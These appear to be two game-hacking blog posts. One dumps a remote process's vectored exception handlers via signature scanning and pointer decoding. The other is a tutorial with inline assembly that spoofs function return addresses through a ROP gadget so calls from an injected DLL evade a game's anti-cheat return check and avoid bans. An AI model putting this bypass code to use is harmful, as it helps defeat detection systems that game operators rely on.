When a CPU exception occurs, the kernel will call the function KiDispatchException (ring0) which will follow this exception to the ntdll method KiUserExceptionDispatcher (ring3). This function will call RtlDispatchException which will try to handle it via the VEH. To do it, it will read the VEH chained list via RtlCallVectoredHandlers and calling each handlers until one return EXCEPTION_CONTINUE_EXECUTION. If a handler returned EXCEPTION_CONTINUE_EXECUTION, the function RtlCallVectoredContinueHandlers is called and it will call all the continue exception handlers.

Exception Path

The VEH handlers are important because the SEH handlers are called only if no VEH handler has caught the exception, so it could be the best method to catch all exceptions if you don’t want to hook KiUserExceptionDispatcher. If you want more information about the exceptions dispatcher, 0vercl0ck has made a good paper about it.

The chained list

The VEH list is a circular linked list with the handlers functions pointers encoded:

Chained List

The exception handlers are encoded with a process cookie but you can decode them easily. If you are dumping the VEH which is inside your own process, you can just use DecodePointer and you don’t have to care about the process cookie. If it’s a remote process you can use DecodeRemotePointer but you will need to create your own function pointer with GetModuleHandle("kernel32.dll") and GetProcAddress("DecodeRemotePointer").

The solution that I have chosen is to imitate DecodePointer by getting the process cookie with ZwQueryProcessInformation and applying the same algorithm:

RtlDecodePointer
DWORD Process::GetProcessCookie() const {
  DWORD cookie = 0;
  DWORD return_length = 0;

  HMODULE ntdll = GetModuleHandleA("ntdll.dll");
  _NtQueryInformationProcess NtQueryInformationProcess =
      reinterpret_cast<_NtQueryInformationProcess>(
          GetProcAddress(ntdll, "NtQueryInformationProcess"));

  NTSTATUS success = NtQueryInformationProcess(
      process_handle_, ProcessCookie, &cookie, sizeof(cookie), &return_length);
  if (success < 0) {
    return 0;
  }
  return cookie;
}

#define ROR(x, y) ((unsigned)(x) >> (y) | (unsigned)(x) << 32 - (y))
DWORD Process::DecodePointer(DWORD pointer) {
  if (!process_cookie_) {
    process_cookie_ = GetProcessCookie();
    if (!process_cookie_) {
      return 0;
    }
  }

  unsigned char shift_size = 0x20 - (process_cookie_ & 0x1f);
  return ROR(pointer, shift_size) ^ process_cookie_;
}

Finding the VEH list offset

Even if you can find the symbol LdrpVectorHandlerList in the ntdll pdb, there is no official API to get it easily. My solution is to begin by getting a pointer to RtlpAddVectoredHandler:

RtlAddVectoredExceptionHandler

You can disassemble the method RtlAddVectoredExceptionHandler until you find the instruction call or you can just pretend that its address is always at 0x16 bytes after it:

BYTE* add_exception_handler = reinterpret_cast<BYTE*>(
    GetProcAddress(ntdll, "RtlAddVectoredExceptionHandler"));
BYTE* add_exception_handler_sub =
    add_exception_handler + 0x16;  // RtlpAddVectoredHandler

And from here the same byte offset method could work, but a simple signature system could prevent us to be broken after a small Windows update:

_LdrpVectorHandlerList
const BYTE pattern_list[] = {
    0x89, 0x46, 0x10,          // mov [esi+10h], eax
    0x81, 0xc3, 0, 0, 0, 0  // add ebx, offset LdrpVectorHandlerList
};
const char mask_list[] = "xxxxx????";
BYTE* match_list =
    SearchPattern(add_exception_handler_sub, 0x100, pattern_list, mask_list);
BYTE* veh_list = *reinterpret_cast<BYTE**>(match_list + 5);
size_t veh_list_offset = veh_list - reinterpret_cast<BYTE*>(ntdll);
printf("LdrpVectorHandlerList: 0x%p (ntdll+0x%x)\n", veh_list, veh_list_offset);

Final code

#define ROR(x, y) ((unsigned)(x) >> (y) | (unsigned)(x) << 32 - (y))

DWORD Process::GetProcessCookie() const {
  DWORD cookie = 0;
  DWORD return_length = 0;

  HMODULE ntdll = GetModuleHandleA("ntdll.dll");
  _NtQueryInformationProcess NtQueryInformationProcess =
      reinterpret_cast<_NtQueryInformationProcess>(
          GetProcAddress(ntdll, "NtQueryInformationProcess"));

  NTSTATUS success = NtQueryInformationProcess(
      process_handle_, ProcessCookie, &cookie, sizeof(cookie), &return_length);
  if (success < 0) {
    return 0;
  }
  return cookie;
}

DWORD Process::DecodePointer(DWORD pointer) {
  if (!process_cookie_) {
    process_cookie_ = GetProcessCookie();
    if (!process_cookie_) {
      return 0;
    }
  }

  unsigned char shift_size = 0x20 - (process_cookie_ & 0x1f);
  return ROR(pointer, shift_size) ^ process_cookie_;
}

typedef struct _VECTORED_HANDLER_ENTRY {
  _VECTORED_HANDLER_ENTRY* next;
  _VECTORED_HANDLER_ENTRY* previous;
  ULONG refs;
  PVECTORED_EXCEPTION_HANDLER handler;
} VECTORED_HANDLER_ENTRY;

typedef struct _VECTORED_HANDLER_LIST {
  void* mutex_exception;
  VECTORED_HANDLER_ENTRY* first_exception_handler;
  VECTORED_HANDLER_ENTRY* last_exception_handler;
  void* mutex_continue;
  VECTORED_HANDLER_ENTRY* first_continue_handler;
  VECTORED_HANDLER_ENTRY* last_continue_handler;
} VECTORED_HANDLER_LIST;

DWORD GetVEHOffset() {
  HMODULE ntdll = LoadLibraryA("ntdll.dll");
  printf("ntdll: 0x%p\n", ntdll);
  perror_if_invalid(ntdll, "LoadLibrary");

  BYTE* add_exception_handler = reinterpret_cast<BYTE*>(
      GetProcAddress(ntdll, "RtlAddVectoredExceptionHandler"));
  printf("RtlAddVectoredExceptionHandler: 0x%p\n", add_exception_handler);
  perror_if_invalid(add_exception_handler, "GetProcAddress");

  BYTE* add_exception_handler_sub = add_exception_handler + 0x16;
  printf("RtlpAddVectoredExceptionHandler: 0x%p\n", add_exception_handler_sub);

  const BYTE pattern_list[] = {
      0x89, 0x46, 0x10,          // mov [esi+10h], eax
      0x81, 0xc3, 0,    0, 0, 0  // add ebx, offset LdrpVectorHandlerList
  };
  const char mask_list[] = "xxxxx????";
  BYTE* match_list =
      SearchPattern(add_exception_handler_sub, 0x100, pattern_list, mask_list);
  perror_if_invalid(match_list, "SearchPattern");
  BYTE* veh_list = *reinterpret_cast<BYTE**>(match_list + 5);
  size_t veh_list_offset = veh_list - reinterpret_cast<BYTE*>(ntdll);
  printf("LdrpVectorHandlerList: 0x%p (ntdll+0x%x)\n", veh_list,
         veh_list_offset);

  return veh_list_offset;
}

int main() {
  auto process = Process::GetProcessByName(L"veh_dumper.exe");
  perror_if_invalid(process.get(), "GetProcessByName");
  printf("Process cookie: 0x%0x\n", process->GetProcessCookie());

  DWORD ntdll = process->GetModuleBase(L"ntdll.dll");
  VECTORED_HANDLER_LIST handler_list;
  DWORD veh_addr = ntdll + GetVEHOffset();
  printf("VEH: 0x%08x\n", veh_addr);
  process->ReadProcMem(veh_addr, &handler_list, sizeof(handler_list));
  printf("First entry: 0x%p\n", handler_list.first_exception_handler);
  printf("Last entry: 0x%p\n", handler_list.last_exception_handler);

  if (reinterpret_cast<DWORD>(handler_list.first_exception_handler) ==
      veh_addr + sizeof(DWORD)) {
    printf("VEH list is empty\n");
    return 0;
  }

  printf("Dumping the entries:\n");
  VECTORED_HANDLER_ENTRY entry;
  process->ReadProcMem(
      reinterpret_cast<DWORD>(handler_list.first_exception_handler), &entry,
      sizeof(entry));
  while (true) {
    DWORD handler = reinterpret_cast<DWORD>(entry.handler);
    printf("  handler = 0x%p => 0x%p\n", handler,
           process->DecodePointer(handler));

    if (reinterpret_cast<DWORD>(entry.next) == veh_addr + sizeof(DWORD)) {
      break;
    }
    process->ReadProcMem(reinterpret_cast<DWORD>(entry.next), &entry,
                         sizeof(entry));
  }
}

POC

Game that uses VEH

With this, I can now walk through VEH and reverse what does the handlers do.
Again, this is not my original writeup, all credits goes to Dimitri Fourny.

Thank you for reading! I hope you’ve enjoyed 🙂

Basic ROP Chaining Attack on x86

There are lot of games that catches “cheaters” by checking the return address of a function call. After executing the function, it will return to the location of call. Anti-cheat checks the return address if it’s within the module range and whitelists ranges, else, if it’s not, you will get flagged and will result to ban.

Assembly Macros

Call

Saves procedure linking information on the stack and branches to the procedure (called procedure) specified with the destination (target) operand. The target operand specifies the address of the first instruction in the called procedure. This operand can be an immediate value, a general purpose register, or a memory location.

This instruction can be used to execute four different types of calls:

Near call
A call to a procedure within the current code segment (the segment currently pointed to by the CS register), sometimes referred to as an intrasegment call.

Far call
A call to a procedure located in a different segment than the current code segment, sometimes referred to as an intersegment call. Inter-privilege-level far call. A far call to a procedure in a segment at a different privilege level than that of the currently executing program or procedure.

Task switch
A call to a procedure located in a different task.

The latter two call types (inter-privilege-level call and task switch) can only be executed in protected mode. See the section titled “Calling Procedures Using Call and RET” in Chapter 6 of the IA-32 Intel Architecture Software Developer’s Manual, Volume 1, for additional information on near, far, and inter-privilege-level calls. See Chapter 6, Task Management, in the IA-32 Intel Architecture Software Developer’s Manual, Volume 3, for information on performing task switches with the CALL instruction.
https://c9x.me/x86/html/file_module_x86_id_26.html

push ReturnAddress — The address of the next instruction after the call
jmp SomeFunc — Change the EIP/RIP to the address of SomeFunc

Ret

Transfers program control to a return address located on the top of the stack. The address is usually placed on the stack by a CALL instruction, and the return is made to the instruction that follows the CALL instruction.

The optional source operand specifies the number of stack bytes to be released after the return address is popped; the default is none. This operand can be used to release parameters from the stack that were passed to the called procedure and are no longer needed. It must be used when the CALL instruction used to switch to a new procedure uses a call gate with a non-zero word count to access the new procedure. Here, the source operand for the RET instruction must specify the same number of bytes as is specified in the word count field of the call gate.

The RET instruction can be used to execute three different types of returns:

Near return
A return to a calling procedure within the current code segment (the segment currently pointed to by the CS register), sometimes referred to as an intrasegment return.

Far return
A return to a calling procedure located in a different segment than the current code segment, sometimes referred to as an intersegment return.

Inter-privilege-level far return
A far return to a different privilege level than that of the currently executing program or procedure.

The inter-privilege-level return type can only be executed in protected mode. See the section titled “Calling Procedures Using Call and RET” in Chapter 6 of the IA-32 Intel Architecture Software Developer’s Manual, Volume 1, for detailed information on near, far, and inter-privilege- level returns.

When executing a near return, the processor pops the return instruction pointer (offset) from the top of the stack into the EIP register and begins program execution at the new instruction pointer. The CS register is unchanged.

When executing a far return, the processor pops the return instruction pointer from the top of the stack into the EIP register, then pops the segment selector from the top of the stack into the CS register. The processor then begins program execution in the new code segment at the new instruction pointer.

The mechanics of an inter-privilege-level far return are similar to an intersegment return, except that the processor examines the privilege levels and access rights of the code and stack segments being returned to determine if the control transfer is allowed to be made. The DS, ES, FS, and GS segment registers are cleared by the RET instruction during an inter-privilege-level return if they refer to segments that are not allowed to be accessed at the new privilege level. Since a stack switch also occurs on an inter-privilege level return, the ESP and SS registers are loaded from the stack.

If parameters are passed to the called procedure during an inter-privilege level call, the optional source operand must be used with the RET instruction to release the parameters on the return.

Here, the parameters are released both from the called procedure’s stack and the calling procedure’s stack (that is, the stack being returned to).
https://c9x.me/x86/html/file_module_x86_id_280.html

add esp, 18h — Increase the stack pointer, decreasing the stack size, usually by the amount of arguments the function takes (that actually got pushed onto the stack and the callee is responsible for cleaning the stack). This is due to the stack “grows” downward.
pop eip — Practically pop the top of the stack into the instruction pointer, effectively “jmp” there.

Push

Decrements the stack pointer and then stores the source operand on the top of the stack. The address-size attribute of the stack segment determines the stack pointer size (16 bits or 32 bits), and the operand-size attribute of the current code segment determines the amount the stack pointer is decremented (2 bytes or 4 bytes). For example, if these address- and operand-size attributes are 32, the 32-bit ESP register (stack pointer) is decremented by 4 and, if they are 16, the 16-bit SP register is decremented by 2. (The B flag in the stack segment’s segment descriptor determines the stack’s address-size attribute, and the D flag in the current code segment’s segment descriptor, along with prefixes, determines the operand-size attribute and also the address-size attribute of the source operand.) Pushing a 16-bit operand when the stack addresssize attribute is 32 can result in a misaligned the stack pointer (that is, the stack pointer is not aligned on a doubleword boundary).

The PUSH ESP instruction pushes the value of the ESP register as it existed before the instruction was executed. Thus, if a PUSH instruction uses a memory operand in which the ESP register is used as a base register for computing the operand address, the effective address of the operand is computed before the ESP register is decremented.

In the real-address mode, if the ESP or SP register is 1 when the PUSH instruction is executed, the processor shuts down due to a lack of stack space. No exception is generated to indicate this condition.
https://c9x.me/x86/html/file_module_x86_id_269.html

sub esp, 4 — Subtracting 4 bytes in case of 32 bits from the stack pointer, effectively increasing the stack size.
mov [esp], eax — Moving the item being pushed to where the current stack pointer is located.

Pop

Loads the value from the top of the stack to the location specified with the destination operand and then increments the stack pointer. The destination operand can be a general-purpose register, memory location, or segment register.

The address-size attribute of the stack segment determines the stack pointer size (16 bits or 32 bits-the source address size), and the operand-size attribute of the current code segment determines the amount the stack pointer is incremented (2 bytes or 4 bytes). For example, if these address- and operand-size attributes are 32, the 32-bit ESP register (stack pointer) is incremented by 4 and, if they are 16, the 16-bit SP register is incremented by 2. (The B flag in the stack segment’s segment descriptor determines the stack’s address-size attribute, and the D flag in the current code segment’s segment descriptor, along with prefixes, determines the operandsize attribute and also the address-size attribute of the destination operand.) If the destination operand is one of the segment registers DS, ES, FS, GS, or SS, the value loaded into the register must be a valid segment selector. In protected mode, popping a segment selector into a segment register automatically causes the descriptor information associated with that segment selector to be loaded into the hidden (shadow) part of the segment register and causes the selector and the descriptor information to be validated (see the “Operation” section below).

A null value (0000-0003) may be popped into the DS, ES, FS, or GS register without causing a general protection fault. However, any subsequent attempt to reference a segment whose corresponding segment register is loaded with a null value causes a general protection exception (#GP). In this situation, no memory reference occurs and the saved value of the segment register is null.

The POP instruction cannot pop a value into the CS register. To load the CS register from the stack, use the RET instruction.

If the ESP register is used as a base register for addressing a destination operand in memory, the POP instruction computes the effective address of the operand after it increments the ESP register. For the case of a 16-bit stack where ESP wraps to 0h as a result of the POP instruction, the resulting location of the memory write is processor-family-specific.

The POP ESP instruction increments the stack pointer (ESP) before data at the old top of stack is written into the destination.

A POP SS instruction inhibits all interrupts, including the NMI interrupt, until after execution of the next instruction. This action allows sequential execution of POP SS and MOV ESP, EBP instructions without the danger of having an invalid stack during an interrupt1. However, use of the LSS instruction is the preferred method of loading the SS and ESP registers.
https://c9x.me/x86/html/file_module_x86_id_248.html

mov eax, [esp] — Move the value on top of the stack into whatever is being pop into.
add esp, 4 — To increase the esp, reducing the size of the stack.

Gadget/ROP Chaining

The idea
The technicality

Let’s get our hands dirty!

WARNING: ALL DETAILS BELOW ARE FOR EDUCATIONAL PURPOSES ONLY.

Now, our goal is to spoof the return address so we will not be having troubles with the return checks, thus, we will not get our account banned.

Normal call

As you can see in the example image, we have our application module that ranges from 0x500000 until 0x600000. The only valid return address should be in this range, otherwise the application will know that we are calling the function from different module.

Now to get things complicated, what if our function call is outside of the application module? Say, it was from an injected DLL?

Call outside of main module

As you can see above, we are calling the function somewhere from 0x700000 ~ 0x800000 which is not a valid range for return check, and would result our account to being banned.

Hands-on: Our target application (Game)

As we check the function we want to call, there is a return check inside of it.

Return check

The Solution

	static void Engine::CastSpellSelf(int SlotID) {
		if (me->IsAlive()) {
			DWORD spellbook = (DWORD)me + (DWORD)oObjSpellBook;
			auto spellslot = me->GetSpellSlotByID(SlotID);
			Vector* objPos = &me->GetPos();
			Vector* mePos = &me->GetPos();
			DWORD objNetworkID = 0;
			DWORD SpoofAddress = (DWORD)GetModuleHandle(NULL) + (DWORD)oRetAddr; //retn instruction
			DWORD CastSpellAddr = (DWORD)GetModuleHandle(NULL) + (DWORD)oCastSpell;//CastSpell


			if (((*(DWORD*)SpoofAddress) & 0xFF) != 0xC3)
				return; //This isn't the instruction we're looking for

			__asm
			{
				push retnHere //address of our function,  
					mov ecx, spellbook //If the function is a __thiscall don't forget to set ECX
					push objNetworkID
					push mePos
					push objPos
					push SlotID
					push spellslot
					push SpoofAddress
					jmp CastSpellAddr
				retnHere :
			}
		}
	}

As you can see above, from the line 18 to line 23, that is our original function parameters. In line 24, I also pushed the SpoofAddress, which is our gadget.

Our gadget

When the function has finished executing, it will pop to our gadget, then it will hit the return instruction back where we originally called the function (outside of the application). The return address will be our gadget, which is inside the application module, thus successfully bypassing the return check.

Additional Note (Another example)

The function above is a __thiscall function. As per microsoft documentation, the function will clean the passed parameters itself that’s why our gadget has only retn instruction. On other case, if it does not clean the passed parameters, then you might want to find a gadget inside the application module that does pop the passed parameters before the retn.

Target function

The above function will be our target and we want to spoof the return address when we call it. Since its __cdecl, we want to clean our own parameters after executing the function. Just find a gadget inside the module that has the ff instructions:

add esp, 28 
ret

We need to clean the esp stack by size of 28, which comes from the parameters. We have 7 parameters so the formula will be 7 x 4bytes = 28, then return.

Thankfully, there is a site where you can easily transform instructions to opcodes so you can easily search the module.

Instruction to opcode
IDA: Binary Search
A lot of results you can choose from

Testing if our spoof works

It’s easy to tell if your spoof works. Just run the application and see if you will get banned after a few days ???

BAN

Or just write a code that gets the value of variable where the flag is being stored.

If you are lucky enough in bypassing the check, then you are now safe from bans (or you just think so).

Sample

Conclusion

First of all, I want to say thank you to the people of UC for giving some quite good materials and resources. Second, I want to thank PITSF for inspiring a lot of people who’s interested in ethical hacking and security. Mabuhay po kayo. And last but not the least, I want to thank the readers who finished reading this post. I am sorry if there are grammatical/terminology errors, English is not my mother tongue.

ROP Chaining Attack is easy to execute but having additional layer of security is enough to catch intruders to the system. Some anti-cheat enumerate the modules, some implements whitelist of modules, some hook the system functions for them to have advantage on control of system, and etc.

Once again, thank you so much!